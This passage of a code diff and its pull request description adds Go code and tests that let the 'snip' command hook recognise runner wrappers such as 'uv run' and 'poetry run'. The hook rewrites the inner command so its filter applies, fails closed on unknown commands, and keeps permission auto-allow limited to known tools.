+// snip strips the prefix, locates the inner command, wraps that inner command
+// so its filter applies, and re-prepends the prefix unchanged. This mirrors
+// rtk's transparent_prefixes concept.
+type TransparentPrefix struct {
+	// Prefix is the literal wrapper, matched on a word boundary: "uv run" matches
+	// "uv run ..." but not "uv runner".
+	Prefix string
+	// ValueFlags are runner flags that consume the following token as their value
+	// (e.g. uv's "--python 3.12"). They let LocateInner skip a flag's value while
+	// scanning for the inner command. Empty for prefixes with no value-taking
+	// flags before the inner command.
+	ValueFlags map[string]bool
+	// SkipFlags reports whether flags may appear between the prefix and the inner
+	// command (true for runners like "uv run" whose options precede the command).
+	// When false, the inner command must immediately follow the prefix; any flag
+	// fails closed. This guards shell wrappers whose flags change semantics
+	// (e.g. "command -v pytest" is a non-executing lookup, not an exec wrapper).
+	SkipFlags bool
+}
+
+// BuiltinTransparentPrefixes are always active, in addition to any
+// user-configured prefixes. Restricted to wrappers that transparently exec an
+// inner program. Remote-code runners (npx, bunx, pnpm dlx) are intentionally
+// excluded: they fetch and run arbitrary code and must not be treated as a
+// transparent pass-through.
+var BuiltinTransparentPrefixes = []TransparentPrefix{
+	{Prefix: "uv run", SkipFlags: true, ValueFlags: flagSet(
+		"--python", "-p",
+		"--with", "--with-requirements", "--with-editable",
+		"--index", "--default-index", "--extra",
+		"--directory", "--project",
+		"--resolution", "--prerelease", "--index-strategy",
+		"--exclude-newer", "--config-file",
+	)},
+	{Prefix: "poetry run", SkipFlags: true},
+	{Prefix: "pdm run", SkipFlags: true},
+	{Prefix: "pipenv run", SkipFlags: true},
+	{Prefix: "rye run", SkipFlags: true},
+	{Prefix: "hatch run", SkipFlags: true},
+	// Shell wrappers that exec their argument list unchanged. SkipFlags stays
+	// false: their flags change semantics (e.g. "command -v" is a lookup that
+	// does not execute its operand), so the inner command must follow directly.
+	{Prefix: "noglob"},
+	{Prefix: "nocorrect"},
+	{Prefix: "command"},
+	{Prefix: "exec"},
+}
+
+// MergeTransparentPrefixes returns the built-in prefixes plus any user-configured
+// ones. Results are ordered longest-prefix-first so a more specific prefix
+// ("docker exec ctr") is matched before a shorter one ("exec") it contains.
+func MergeTransparentPrefixes(user []string) []TransparentPrefix {
+	out := make([]TransparentPrefix, 0, len(BuiltinTransparentPrefixes)+len(user))
+	out = append(out, BuiltinTransparentPrefixes...)
+	for _, p := range user {
+		if p = strings.TrimSpace(p); p != "" {
+			out = append(out, TransparentPrefix{Prefix: p})
+		}
+	}
+	// Stable insertion sort by descending prefix length (small slice, no import).
+	for i := 1; i < len(out); i++ {
+		for j := i; j > 0 && len(out[j].Prefix) > len(out[j-1].Prefix); j-- {
+			out[j], out[j-1] = out[j-1], out[j]
+		}
+	}
+	return out
+}
+
+// matchTransparentPrefix returns the first prefix whose literal wrapper begins
+// bareCmd on a word boundary, along with the remainder after the prefix
+// (leading whitespace trimmed). ok is false when no prefix matches or the
+// matched prefix has no inner command (e.g. "uv run" alone).
+func matchTransparentPrefix(bareCmd string, prefixes []TransparentPrefix) (tp TransparentPrefix, rest string, ok bool) {
+	for _, p := range prefixes {
+		if r, found := stripWordPrefix(bareCmd, p.Prefix); found && r != "" {
+			return p, r, true
+		}
+	}
+	return TransparentPrefix{}, "", false
+}
+
+// stripWordPrefix removes prefix from s when s is exactly prefix or prefix
+// followed by whitespace, returning the remainder with leading whitespace
+// trimmed. It guards against partial-word matches ("uv runner").
+func stripWordPrefix(s, prefix string) (rest string, ok bool) {
+	if !strings.HasPrefix(s, prefix) {
+		return "", false
+	}
+	r := s[len(prefix):]
+	if r == "" {
+		return "", true // exact match, no inner command
+	}
+	if r[0] != ' ' && r[0] != '\t' {
+		return "", false // partial word, not a real prefix
+	}
+	return strings.TrimLeft(r, " \t"), true
+}
+
+// LocateInner scans rest (the text after a transparent prefix) for the inner
+// command. It skips runner flags: value-taking flags (per valueFlags) also
+// consume their following token. The first non-flag token must be a known snip
+// command; otherwise LocateInner fails closed (ok=false) so an unrecognized
+// inner command — or an argument mistaken for one — is never rewritten.
+//
+// On success, before is the slice of rest preceding the inner command (so the
+// caller can reconstruct "<prefix> <before><snip run --> <inner...>"), and
+// innerBase is the inner command's base name for attestation checks.
+func LocateInner(rest string, cmdSet map[string]struct{}, valueFlags map[string]bool, skipFlags bool) (before, innerBase string, ok bool) {
+	toks := splitTokens(rest)
+	for i := 0; i < len(toks); i++ {
+		t := toks[i].text
+		if strings.HasPrefix(t, "-") {
+			if !skipFlags {
+				// Flags are not permitted between this prefix and the command:
+				// fail closed rather than risk a semantics-changing flag.
+				return "", "", false
+			}
+			// "--flag=value" is self-contained; "--flag value" consumes the next
+			// token only when --flag is a known value-taking flag.
+			if valueFlags[t] && !strings.Contains(t, "=") {
+				i++
+			}
+			continue
+		}
+		base := BaseCommand(t)
+		if _, known := cmdSet[base]; known {
+			return rest[:toks[i].start], base, true
+		}
+		// First non-flag token is not a known command: fail closed. This keeps
+		// "uv run echo pytest" from being rewritten as if pytest were the target.
+		return "", "", false
+	}
+	return "", "", false
+}
+
+// rawToken is a whitespace-delimited token with its start offset in the source.
+type rawToken struct {
+	text  string
+	start int
+}
+
+// splitTokens splits s on unquoted whitespace, preserving single- and
+// double-quoted regions (and backslash escapes inside double quotes) so a
+// quoted flag value is not broken apart. Offsets index into s.
+func splitTokens(s string) []rawToken {
+	var toks []rawToken
+	i := 0
+	for i < len(s) {
+		for i < len(s) && (s[i] == ' ' || s[i] == '\t') {
+			i++
+		}
+		if i >= len(s) {
+			break
+		}
+		start := i
+		var quote byte
+		for i < len(s) {
+			c := s[i]
+			if quote != 0 {
+				if c == '\\' && quote == '"' && i+1 < len(s) {
+					i += 2
+					continue
+				}
+				if c == quote {
+					quote = 0
+				}
+				i++
+				continue
+			}
+			if c == ' ' || c == '\t' {
+				break
+			}
+			if c == '\'' || c == '"' {
+				quote = c
+			}
+			i++
+		}
+		toks = append(toks, rawToken{text: s[start:i], start: start})
+	}
+	return toks
+}
+
+// flagSet builds a set from flag names.
+func flagSet(flags ...string) map[string]bool {
+	m := make(map[string]bool, len(flags))
+	for _, f := range flags {
+		m[f] = true
+	}
+	return m
+}

--- a/internal/hook/transparent_test.go
+++ b/internal/hook/transparent_test.go
@@ -1,0 +1,112 @@
+package hook
+
+import "testing"
+
+func TestStripWordPrefix(t *testing.T) {
+	cases := []struct {
+		s, prefix string
+		wantRest  string
+		wantOK    bool
+	}{
+		{"uv run pytest", "uv run", "pytest", true},
+		{"uv run", "uv run", "", true},
+		{"uv run   pytest -v", "uv run", "pytest -v", true},
+		{"uv runner foo", "uv run", "", false}, // partial word
+		{"poetry run pytest", "uv run", "", false},
+		{"exec pytest", "exec", "pytest", true},
+	}
+	for _, tc := range cases {
+		rest, ok := stripWordPrefix(tc.s, tc.prefix)
+		if ok != tc.wantOK || rest != tc.wantRest {
+			t.Errorf("stripWordPrefix(%q,%q) = (%q,%v), want (%q,%v)",
+				tc.s, tc.prefix, rest, ok, tc.wantRest, tc.wantOK)
+		}
+	}
+}
+
+func TestLocateInner(t *testing.T) {
+	cmdSet := map[string]struct{}{"pytest": {}, "ruff": {}}
+	uvFlags := flagSet("--python", "-p", "--with")
+
+	cases := []struct {
+		name       string
+		rest       string
+		valueFlags map[string]bool
+		skipFlags  bool
+		wantBefore string
+		wantInner  string
+		wantOK     bool
+	}{
+		{"direct command", "pytest tests/", nil, true, "", "pytest", true},
+		{"boolean flag skipped", "--frozen pytest", nil, true, "--frozen ", "pytest", true},
+		{"value flag and value skipped", "--python 3.12 pytest -v", uvFlags, true, "--python 3.12 ", "pytest", true},
+		{"with package value skipped", "--with cov pytest", uvFlags, true, "--with cov ", "pytest", true},
+		{"flag eq form", "--python=3.12 pytest", uvFlags, true, "--python=3.12 ", "pytest", true},
+		{"dash dash separator", "-- pytest", nil, true, "-- ", "pytest", true},
+		{"unknown inner fails closed", "echo pytest", nil, true, "", "", false},
+		{"no command at all", "--frozen --isolated", uvFlags, true, "", "", false},
+		{"empty", "", nil, true, "", "", false},
+		// Value of a value-flag that happens to be a known command is consumed,
+		// not mistaken for the inner command.
+		{"value flag value is a known cmd", "--with ruff pytest", uvFlags, true, "--with ruff ", "pytest", true},
+		// skipFlags=false (shell wrappers): a leading flag fails closed so a
+		// mode flag like "command -v" never rewrites a non-executing lookup.
+		{"no-skip direct command", "pytest -q", nil, false, "", "pytest", true},
+		{"no-skip flag fails closed", "-v pytest", nil, false, "", "", false},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			before, inner, ok := LocateInner(tc.rest, cmdSet, tc.valueFlags, tc.skipFlags)
+			if ok != tc.wantOK || before != tc.wantBefore || inner != tc.wantInner {
+				t.Errorf("LocateInner(%q) = (%q,%q,%v), want (%q,%q,%v)",
+					tc.rest, before, inner, ok, tc.wantBefore, tc.wantInner, tc.wantOK)
+			}
+		})
+	}
+}
+
+func TestMergeTransparentPrefixesOrdersByLength(t *testing.T) {
+	got := MergeTransparentPrefixes([]string{"docker exec ctr", "", "  ssh host  "})
+	// User prefixes are included.
+	var hasDocker, hasSSH bool
+	for _, p := range got {
+		if p.Prefix == "docker exec ctr" {
+			hasDocker = true
+		}
+		if p.Prefix == "ssh host" {
+			hasSSH = true
+		}
+	}
+	if !hasDocker || !hasSSH {
+		t.Fatalf("user prefixes missing: %+v", got)
+	}
+	// Longest-first ordering: each prefix is at least as long as the next.
+	for i := 1; i < len(got); i++ {
+		if len(got[i].Prefix) > len(got[i-1].Prefix) {
+			t.Fatalf("not ordered longest-first at %d: %q before %q", i, got[i-1].Prefix, got[i].Prefix)
+		}
+	}
+}
+
+func TestMatchTransparentPrefix(t *testing.T) {
+	prefixes := MergeTransparentPrefixes([]string{"docker exec ctr"})
+	cases := []struct {
+		bareCmd  string
+		wantPfx  string
+		wantRest string
+		wantOK   bool
+	}{
+		{"uv run pytest -v", "uv run", "pytest -v", true},
+		{"docker exec ctr pytest", "docker exec ctr", "pytest", true},
+		{"poetry run ruff check", "poetry run", "ruff check", true},
+		{"uv run", "", "", false}, // no inner command
+		{"git status", "", "", false},
+	}
+	for _, tc := range cases {
+		tp, rest, ok := matchTransparentPrefix(tc.bareCmd, prefixes)
+		if ok != tc.wantOK || tp.Prefix != tc.wantPfx || rest != tc.wantRest {
+			t.Errorf("matchTransparentPrefix(%q) = (%q,%q,%v), want (%q,%q,%v)",
+				tc.bareCmd, tp.Prefix, rest, ok, tc.wantPfx, tc.wantRest, tc.wantOK)
+		}
+	}
+}


### PR DESCRIPTION
Closes #91.

## Problem

snip ships filters for tools like `pytest` and `ruff`, but they only match when the tool is invoked directly. Running it through a runner wrapper -- `uv run pytest`, `poetry run ruff check` -- bypasses the filter entirely. The issue asked for a way to reuse an existing filter under such a wrapper without copying and maintaining its options.

## Approach

Mirror rtk's *transparent prefixes*: strip the runner prefix, route the inner command normally, and re-prepend the prefix unchanged. The snip binary ends up positioned right before the inner command:

```
uv run pytest -v            -> uv run <snip> run -- pytest -v
uv run --python 3.12 pytest -> uv run --python 3.12 <snip> run -- pytest
poetry run ruff check .     -> poetry run <snip> run -- ruff check .
```

At runtime the runner sets up its environment and execs the absolute snip binary, which sees `pytest` and applies the existing pytest filter + injection. **No registry, engine, or injection change** -- this lives entirely in the hook layer, so all existing filters work wrapped with zero per-filter maintenance.

Built-in prefixes: `uv run`, `poetry run`, `pdm run`, `pipenv run`, `rye run`, `hatch run`, plus the shell wrappers `noglob` / `nocorrect` / `command` / `exec`. Users add their own via:

```toml
[filters]
transparent_prefixes = ["docker exec mycontainer", "direnv exec ."]
```

## Detection rules

- **Fail-closed:** the first non-flag token after the prefix must be a known snip command; otherwise the command passes through untouched. An argument is never mistaken for the command (`uv run echo pytest` is not rewritten).
- **Runner flags** (uv) are skipped, with a small value-flag table so `uv run --python 3.12 pytest` lands the injection after `pytest`.
- **Shell wrappers** reject any flag, so a mode flag like `command -v pytest` (a non-executing lookup, not an exec wrapper) is never rewritten.

## Security (#88)

The `permissionDecision=allow` guarantee is preserved: a runner whose inner program is unknown (e.g. `poetry run bash -c ...`) is never rewritten or auto-allowed, so Claude Code still prompts. Runners are never added to the command set; attestation keys off the inner command.

## Tests

- Unit tests for the inner-command locator (flag skipping, value-flags, quoting, fail-closed cases).
- End-to-end hook tests: `uv run --python 3.12 pytest -v` is rewritten and auto-allowed; `poetry run bash -c ...` and `command -v pytest` pass through.
- `golangci-lint run` and `make test-race` green.

## Out of scope

`uv run <unknown-program>` remains auto-allowed because `uv` is already in the command set (pre-existing behavior, unchanged by this PR). Tightening that is a separate security change and can be tracked in a follow-up issue.